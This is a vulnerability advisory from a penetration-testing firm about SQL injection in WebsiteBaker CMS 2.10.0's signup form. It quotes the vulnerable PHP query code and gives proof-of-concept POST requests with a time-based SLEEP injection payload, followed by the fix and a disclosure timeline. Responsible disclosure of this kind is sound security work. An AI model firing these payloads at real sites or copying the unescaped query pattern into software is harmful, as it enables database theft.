WebsiteBaker-CMS

WebsiteBaker CMS 2.10.0 – Multiple SQL Injection Vulnerabilities

Overview

WebsiteBaker 2.10.0 and lower versions are vulnerable to SQL injection vulnerabilities.

Background

WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS).

Details

It is possible for an unauthenticated user to inject SQL code into the variables “username” and “display_name” in the “account/signup.php” PHP script (signup form). The vulnerability exists due to insufficient filtration of user-supplied data. By exploiting this vulnerability, an attacker gains access to all records stored in the database with the privileges of the WebsiteBaker database user (e.g. administrator password MD5 hash).



Vulnerable code:
account/signup2.php

40 $username = strtolower(strip_tags($wb-&gt;get_post('username'))); &lt;-- <strong>vstup od užívateľa</strong>
41 $display_name = strip_tags($wb-&gt;get_post('display_name')); &lt;-- <strong>vstup od užívateľa</strong>
...
50 // Check if username already exists
51 $sql = 'SELECT `user_id` FROM `'.TABLE_PREFIX.'users` WHERE `username` = \''.$username.'\''; &lt;-- <strong>SQL injection č.1</strong>
52 if ($database-&gt;get_one($sql)) {
53     $error[] = $MESSAGE['USERS_USERNAME_TAKEN']."\n";
54 }
55 if(!preg_match('/^[a-z]{1}[a-z0-9_-]{2,}$/i', $username)) {
56    $error[] =  $MESSAGE['USERS_NAME_INVALID_CHARS']."\n";
57 }
58 $sql  = 'SELECT COUNT(*) FROM `'.TABLE_PREFIX.'users` ';
59 $sql .= 'WHERE  `display_name` LIKE \''.$display_name.'\''; &lt;-- <strong>SQL injection č.2</strong>
60 if ($database-&gt;get_one($sql) &gt; 0) {
61     $error[] = $MESSAGE['USERS_DISPLAYNAME_TAKEN'].'';

The POST parameters “username” (line 40) and “display_name” (line 41) are used unsanitized in function “get_one” (line 52 and 60) for SQL queries. No prepared statements or escaping is used.

framework/class.database.php

102    // Gets the first column of the first row
103    function get_one( $statement )
104    {
105        $fetch_row = mysqli_fetch_array(mysqli_query($this-&gt;db_handle, $statement) );
106        $result = $fetch_row[0];
107        $this-&gt;set_error(null);
108        if(mysqli_error($this-&gt;db_handle)) {
109            $this-&gt;set_error(mysqli_error($this-&gt;db_handle));
110            return null;
111        } else {
112            return $result;
113        }
114    }

Proof of concept

SQL Injection no.1: parameter username

Payload: sql’ OR SLEEP(5)–

POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

action=send&redirect=http%3A%2F%2Flocalhost&submitted_when=1490134734&email-address=&name=&full_name=username=sql' OR SLEEP(5)-- &display_name=testemail=testcaptcha=submit=Sign-up

The response will have a delay 5 seconds.

SQL Injection no.2: parameter display_name

Payload: sql’ OR SLEEP(5)–

POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

action=send&amp;redirect=http%3A%2F%2Flocalhost&amp;submitted_when=1490134833&amp;email-address=&amp;name=&amp;full_name=&amp;username=test&amp;<strong>display_name=sql' OR SLEEP(5)--</strong> &amp;email=test&amp;captcha=&amp;submit=Sign-up

The response will have a delay 5 seconds.

 

Solution

Update to WebsiteBaker 2.10.1 or newer version.

 

Report timeline

24.03.2017 Informed vendor about vulnerabilities
25.03.2017 Vendor confirms and releases fixes
03.04.2017 CVE assigned
07.04.2017 Disclosed to public

Credit

These vulnerabilities were discovered by Marek Alaksa from Citadelo.

 

References

  1. www.citadelo.com/en/websitebaker-cms-2-10-0-multiple-sql-injection-vulnerabilities
  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7410
  3. http://websitebaker.org
  4. http://project.websitebaker.org/issues/39
  5. http://forum.websitebaker.org/index.php/topic,30187.0.html

Über den Autor

Citadelo
Citadelo
Citadelo is a firm of ethical hackers on your side. We think like hackers, but we don't abuse it. On the contrary, our main goal is to reveal vulnerabilities without causing damage. We have been conducting simulated attacks for our clients since 2006
Mehr von diesem Autor

Verwandte Blogs

How to order a pen test

Blog | | Martin Hanic
Although people working in the IT security industry may consider this question to be as trivial as "How to order a phone charger", for many, writing a purchase order for a penetration test can be like designing a nuclear power plant.
Anzeigen

Unofficial Patch Tuesday – MSMQ Privilege Escalation Vulnerability Hotfix

Blog | | Citadelo
This security patch resolves a public vulnerability in the Windows Message Queuing Service (MSMQ) discovered by KoreLogic
Anzeigen

We found vulnerability of CMS Made Simple

Blog | | Citadelo
CMS Made Simple is a free, open source CMS to provide developers, programmers and site owners a web-based development and administration area. In 2010 it won the Packt Publishing annual award for open source content management.
Anzeigen

ExtendedMacro – BurpSuite plugin

Blog | | Citadelo
BurpSuite Proxy is one of the most used HTTP proxy application for web penetration testers. This tool is one of the best in its category, but sometimes we encounter a situation requiring additional functionality which is not provided by Burp itself.
Anzeigen